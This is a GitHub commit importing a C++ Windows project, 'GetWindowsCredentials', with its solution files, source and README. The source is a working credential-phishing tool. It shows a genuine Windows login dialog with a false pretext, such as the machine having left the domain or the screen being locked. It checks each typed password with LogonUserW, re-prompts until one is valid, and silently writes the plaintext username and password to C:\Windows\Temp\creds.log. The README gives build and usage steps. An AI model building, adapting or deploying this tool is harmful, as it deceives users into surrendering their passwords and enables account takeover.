Skip to content

Commit 8f5bebc

Browse files
author
GitHub
committed
import
0 parents  commit 8f5bebc

7 files changed

Lines changed: 457 additions & 0 deletions

File tree

.gitignore

Lines changed: 13 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,13 @@
1+
2+
# Visual Studio
3+
.vs/
4+
.vscode/
5+
6+
# Build output
7+
bin/
8+
obj/
9+
10+
# Temporary files
11+
*.tmp
12+
*.log
13+
*.user

GetWindowsCredentials.sln

Lines changed: 31 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,31 @@
1+
2+
Microsoft Visual Studio Solution File, Format Version 12.00
3+
# Visual Studio Version 16
4+
VisualStudioVersion = 16.0.31410.357
5+
MinimumVisualStudioVersion = 10.0.40219.1
6+
Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "GetWindowsCredentials", "GetWindowsCredentials\GetWindowsCredentials.vcxproj", "{A45704CC-CB03-4AD7-AD41-1F2F54147EDA}"
7+
EndProject
8+
Global
9+
GlobalSection(SolutionConfigurationPlatforms) = preSolution
10+
Debug|x64 = Debug|x64
11+
Debug|x86 = Debug|x86
12+
Release|x64 = Release|x64
13+
Release|x86 = Release|x86
14+
EndGlobalSection
15+
GlobalSection(ProjectConfigurationPlatforms) = postSolution
16+
{A45704CC-CB03-4AD7-AD41-1F2F54147EDA}.Debug|x64.ActiveCfg = Debug|x64
17+
{A45704CC-CB03-4AD7-AD41-1F2F54147EDA}.Debug|x64.Build.0 = Debug|x64
18+
{A45704CC-CB03-4AD7-AD41-1F2F54147EDA}.Debug|x86.ActiveCfg = Debug|Win32
19+
{A45704CC-CB03-4AD7-AD41-1F2F54147EDA}.Debug|x86.Build.0 = Debug|Win32
20+
{A45704CC-CB03-4AD7-AD41-1F2F54147EDA}.Release|x64.ActiveCfg = Release|x64
21+
{A45704CC-CB03-4AD7-AD41-1F2F54147EDA}.Release|x64.Build.0 = Release|x64
22+
{A45704CC-CB03-4AD7-AD41-1F2F54147EDA}.Release|x86.ActiveCfg = Release|Win32
23+
{A45704CC-CB03-4AD7-AD41-1F2F54147EDA}.Release|x86.Build.0 = Release|Win32
24+
EndGlobalSection
25+
GlobalSection(SolutionProperties) = preSolution
26+
HideSolutionNode = FALSE
27+
EndGlobalSection
28+
GlobalSection(ExtensibilityGlobals) = postSolution
29+
SolutionGuid = {60239394-BA56-4F73-83CE-A8EBB7B2FA42}
30+
EndGlobalSection
31+
EndGlobal

GetWindowsCredentials/GetWindowsCredentials.vcxproj

Lines changed: 153 additions & 0 deletions
Large diffs are not rendered by default.
Lines changed: 22 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,22 @@
1+
<?xml version="1.0" encoding="utf-8"?>
2+
<Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
3+
<ItemGroup>
4+
<Filter Include="源文件">
5+
<UniqueIdentifier>{4FC737F1-C7A5-4376-A066-2A32D752A2FF}</UniqueIdentifier>
6+
<Extensions>cpp;c;cc;cxx;c++;cppm;ixx;def;odl;idl;hpj;bat;asm;asmx</Extensions>
7+
</Filter>
8+
<Filter Include="头文件">
9+
<UniqueIdentifier>{93995380-89BD-4b04-88EB-625FBE52EBFB}</UniqueIdentifier>
10+
<Extensions>h;hh;hpp;hxx;h++;hm;inl;inc;ipp;xsd</Extensions>
11+
</Filter>
12+
<Filter Include="资源文件">
13+
<UniqueIdentifier>{67DA6AB6-F800-4c08-8B7A-83BB121AAD01}</UniqueIdentifier>
14+
<Extensions>rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms</Extensions>
15+
</Filter>
16+
</ItemGroup>
17+
<ItemGroup>
18+
<ClCompile Include="Source.cpp">
19+
<Filter>源文件</Filter>
20+
</ClCompile>
21+
</ItemGroup>
22+
</Project>

GetWindowsCredentials/Source.cpp

Lines changed: 97 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,97 @@
1+
#include <Windows.h>
2+
#include <wincred.h>
3+
#pragma comment(lib,"Credui.lib")
4+
5+
BOOL WriteCred(LPWSTR saveAs,LPWSTR username, LPWSTR password) {
6+
PWCHAR szBuffer = new WCHAR[CREDUI_MAX_USERNAME_LENGTH + CREDUI_MAX_USERNAME_LENGTH+1];
7+
HANDLE hFile = CreateFile(
8+
saveAs,
9+
GENERIC_ALL,
10+
FILE_SHARE_READ,
11+
NULL,
12+
OPEN_ALWAYS,
13+
FILE_ATTRIBUTE_NORMAL,
14+
NULL
15+
);
16+
wsprintf(szBuffer, L"[+]Username: %s , Password: %s\n", username, password);
17+
if (hFile != INVALID_HANDLE_VALUE) {
18+
WriteFile(hFile, szBuffer, lstrlenW(szBuffer)*sizeof(WCHAR), NULL, NULL);
19+
CloseHandle(hFile);
20+
return TRUE;
21+
}
22+
return FALSE;
23+
}
24+
25+
int WINAPI WinMain(HINSTANCE hInstance, HINSTANCE hPrevInstance, LPSTR lpCmdLine, int nCmdShow) {
26+
WCHAR username[CREDUI_MAX_USERNAME_LENGTH* sizeof(WCHAR)] = { 0 };
27+
WCHAR password[CREDUI_MAX_PASSWORD_LENGTH* sizeof(WCHAR)] = { 0 };
28+
WCHAR domain[CREDUI_MAX_DOMAIN_TARGET_LENGTH * sizeof(WCHAR)] = { 0 };
29+
DWORD dwUsernameSize = CREDUI_MAX_USERNAME_LENGTH+1;
30+
DWORD dwPasswordSize = CREDUI_MAX_PASSWORD_LENGTH+1;
31+
DWORD dwDomainSize = CREDUI_MAX_DOMAIN_TARGET_LENGTH + 1;
32+
WCHAR parsedUserName[CREDUI_MAX_USERNAME_LENGTH * sizeof(WCHAR)];
33+
WCHAR parsedDomain[CREDUI_MAX_DOMAIN_TARGET_LENGTH * sizeof(WCHAR)];
34+
// 提示信息
35+
WCHAR baseCaption[] = L"请输入当前用户账号密码:";
36+
WCHAR pszCaptionText[] = L"您的机器已脱域,请重新认证";
37+
// 保存凭据位置
38+
WCHAR saveAs[] = L"C:\\Windows\\Temp\\creds.log";
39+
LPWSTR boxMessage = NULL;
40+
ULONG authPackage = 0;
41+
LPVOID outCredBuffer = NULL;
42+
ULONG outCredSize = 0;
43+
BOOL bsave = FALSE;
44+
BOOL bLoginStatus = FALSE;
45+
CREDUI_INFOW credui = { sizeof(credui) };
46+
credui.cbSize = sizeof(credui);
47+
HANDLE hLogon = NULL;
48+
credui.hwndParent = NULL;
49+
50+
credui.pszMessageText = baseCaption;
51+
credui.pszCaptionText = (PCWSTR)pszCaptionText;
52+
// Always try to Login...
53+
__LOGIN:
54+
DWORD dwRet = CredUIPromptForWindowsCredentialsW(
55+
&credui,
56+
0,
57+
&authPackage,
58+
NULL,
59+
0,
60+
&outCredBuffer,
61+
&outCredSize,
62+
&bsave,
63+
CREDUIWIN_ENUMERATE_CURRENT_USER
64+
);
65+
if (dwRet == ERROR_SUCCESS) {
66+
CredUnPackAuthenticationBufferW(
67+
CRED_PACK_PROTECTED_CREDENTIALS,
68+
outCredBuffer,
69+
outCredSize,
70+
username,
71+
&dwUsernameSize,
72+
domain,
73+
&dwDomainSize,
74+
password,
75+
&dwPasswordSize
76+
);
77+
78+
CredUIParseUserNameW(
79+
username,
80+
parsedUserName,
81+
CREDUI_MAX_USERNAME_LENGTH + 1,
82+
parsedDomain,
83+
CREDUI_MAX_DOMAIN_TARGET_LENGTH + 1
84+
);
85+
bLoginStatus = LogonUserW(parsedUserName, parsedDomain, password, LOGON32_LOGON_NETWORK, LOGON32_PROVIDER_DEFAULT, &hLogon);
86+
if (bLoginStatus) {
87+
WriteCred(saveAs, username, password);
88+
// MessageBox(NULL, username, password, MB_OK);
89+
}
90+
else {
91+
// 如果登录失败,继续登录。
92+
goto __LOGIN;
93+
}
94+
}
95+
96+
return 0;
97+
}

README.md

Lines changed: 141 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,141 @@
1+
# 🔐 GetWindowsCredentials
2+
3+
A Windows credential harvesting tool that leverages the legitimate Windows API to prompt users for their credentials.
4+
5+
[![Platform](https://img.shields.io/badge/platform-Windows-blue.svg)](https://www.microsoft.com/windows)
6+
[![Language](https://img.shields.io/badge/language-C%2B%2B-00599C.svg)](https://isocpp.org/)
7+
[![License](https://img.shields.io/badge/license-MIT-green.svg)](LICENSE)
8+
9+
## Overview
10+
11+
GetWindowsCredentials uses the Windows API function [CredUIPromptForWindowsCredentialsW](https://learn.microsoft.com/en-us/windows/win32/api/wincred/nf-wincred-creduipromptforwindowscredentialsw) to display a native Windows credential dialog box. When users enter their credentials, the tool validates them against the system and saves successful login attempts to a file.
12+
13+
![Example](./images/example.png)
14+
15+
## Features
16+
17+
- **Native Windows Dialog** - Uses legitimate Windows credential UI
18+
- **Credential Validation** - Verifies credentials against the domain/local system
19+
- **Persistent Prompting** - Continues to prompt until valid credentials are entered
20+
- **Domain Support** - Handles both domain and local accounts
21+
- **Silent Logging** - Saves credentials to a log file without user notification
22+
23+
## How It Works
24+
25+
1. Displays a Windows credential prompt using `CredUIPromptForWindowsCredentialsW`
26+
2. Captures username, password, and domain information
27+
3. Validates credentials using `LogonUserW` API
28+
4. If validation fails, prompts again until successful
29+
5. Saves valid credentials to `C:\Windows\Temp\creds.log`
30+
31+
## Technical Details
32+
33+
### APIs Used
34+
35+
- `CredUIPromptForWindowsCredentialsW` - Display credential dialog
36+
- `CredUnPackAuthenticationBufferW` - Extract credentials from buffer
37+
- `CredUIParseUserNameW` - Parse username and domain
38+
- `LogonUserW` - Validate credentials against the system
39+
40+
### Output Format
41+
42+
Credentials are saved in the following format:
43+
```
44+
[+]Username: DOMAIN\username , Password: password123
45+
```
46+
47+
## Building
48+
49+
### Prerequisites
50+
51+
- Visual Studio 2015 or later
52+
- Windows SDK
53+
- C++ compiler with Windows API support
54+
55+
### Compilation
56+
57+
**Using Visual Studio:**
58+
1. Open Developer Command Prompt
59+
2. Navigate to the source directory
60+
3. Run the following command:
61+
62+
```cmd
63+
cl /EHsc GetWindowsCredentials.cpp /link Credui.lib
64+
```
65+
66+
**Using MinGW:**
67+
```bash
68+
g++ GetWindowsCredentials.cpp -o GetWindowsCredentials.exe -lCredui -mwindows
69+
```
70+
71+
## Usage
72+
73+
### Basic Execution
74+
75+
```cmd
76+
GetWindowsCredentials.exe
77+
```
78+
79+
The program will:
80+
1. Display a Windows credential dialog
81+
2. Wait for the user to enter credentials
82+
3. Validate the credentials
83+
4. Save successful logins to `C:\Windows\Temp\creds.log`
84+
5. Repeat if validation fails
85+
86+
### Customization
87+
88+
You can modify the following constants in the source code:
89+
90+
```cpp
91+
// Dialog text
92+
WCHAR baseCaption[] = L"Enter current user credentials:";
93+
WCHAR pszCaptionText[] = L"Your screen has been locked for security";
94+
95+
// Output file location
96+
WCHAR saveAs[] = L"C:\\Windows\\Temp\\creds.log";
97+
```
98+
99+
## Code Structure
100+
101+
### Main Components
102+
103+
**WriteCred Function**
104+
- Writes captured credentials to a log file
105+
- Formats output with username and password
106+
107+
**WinMain Function**
108+
- Main entry point
109+
- Displays credential prompt
110+
- Validates credentials
111+
- Loops until valid credentials are provided
112+
113+
### Key Variables
114+
115+
- `username` - Captured username (max 514 characters)
116+
- `password` - Captured password (max 256 characters)
117+
- `domain` - Captured domain (max 337 characters)
118+
- `bLoginStatus` - Validation result flag
119+
120+
### Why Credentials Are Validated
121+
122+
The tool validates credentials using `LogonUserW` to:
123+
- Ensure captured credentials are legitimate
124+
- Avoid logging incorrect passwords
125+
- Simulate real-world attack scenarios
126+
- Demonstrate the full credential harvesting process
127+
128+
### Loop Behavior
129+
130+
The program uses a `goto` statement to create a loop that continues prompting until valid credentials are provided. This simulates a locked screen scenario where the user must authenticate to proceed.
131+
132+
## References
133+
134+
- [CredUIPromptForWindowsCredentialsW API](https://learn.microsoft.com/en-us/windows/win32/api/wincred/nf-wincred-creduipromptforwindowscredentialsw)
135+
- [CredUnPackAuthenticationBufferW API](https://learn.microsoft.com/en-us/windows/win32/api/wincred/nf-wincred-credunpackauthenticationbufferw)
136+
- [LogonUserW API](https://learn.microsoft.com/en-us/windows/win32/api/winbase/nf-winbase-logonuserw)
137+
138+
139+
## License
140+
141+
This project is licensed under the MIT License - see the [LICENSE](LICENSE) file for details.

images/example.png

54.6 KB
Loading

0 commit comments

Comments
 (0)